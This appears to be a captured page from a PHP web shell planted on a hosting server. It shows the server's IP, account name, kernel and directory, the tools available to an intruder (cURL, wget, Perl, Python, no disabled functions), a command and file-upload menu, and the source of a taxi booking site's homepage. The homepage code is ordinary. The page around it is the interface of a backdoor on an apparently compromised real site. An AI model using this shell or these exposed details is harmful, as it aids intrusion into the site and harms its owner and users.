Server IP : 103.53.40.154 / Your IP : 3.142.212.119 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/gujarataxi.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include 'header.php';?> <?php include 'banner.php';?> <?php include 'book.php';?> <?php // include 'index-service.php' ;?> <?php include 'index-about.php'; ?> <style> .area-section { background: #ffb300; display: flex; flex-wrap: wrap; justify-content: flex-start; } .area-section a { font-size: 14px; display: block; flex-basis: 33.33%; /* Adjust this value as needed */ text-align: justify; padding: 10px; box-sizing: border-box; } .area-section a:hover { color: white; letter-spacing: 2px; } </style> <section class="area-section py-5"> <div class="container"> <?php $loc_sql=db_query("select * from tbl_location where location_status='Active' and location_parent_id=0 order by location_name asc"); $count = 0; while($loc_res=mysqli_fetch_array($loc_sql)) { if ($count % 3 == 0) { echo '<div class="row">'; } ?> <a href="<?=$site_url?>/<?=$loc_res['location_url']?>/" title="<?=$loc_res['location_name']?>"><i class="fa fa-angle-right"></i> <?=$loc_res['location_name']?></a> <?php if (($count + 1) % 3 == 0) { echo '</div>'; } $count++; } if ($count % 3 != 0) { echo '</div>'; } ?> </div> </div> </section> <?php include 'index-services.php';?> <?php include 'features.php';?> <?php include 'why-choose.php';?> <?php include 'testimonial.php';?> <?php include 'about-book.php';?> <?php include 'footer.php';?>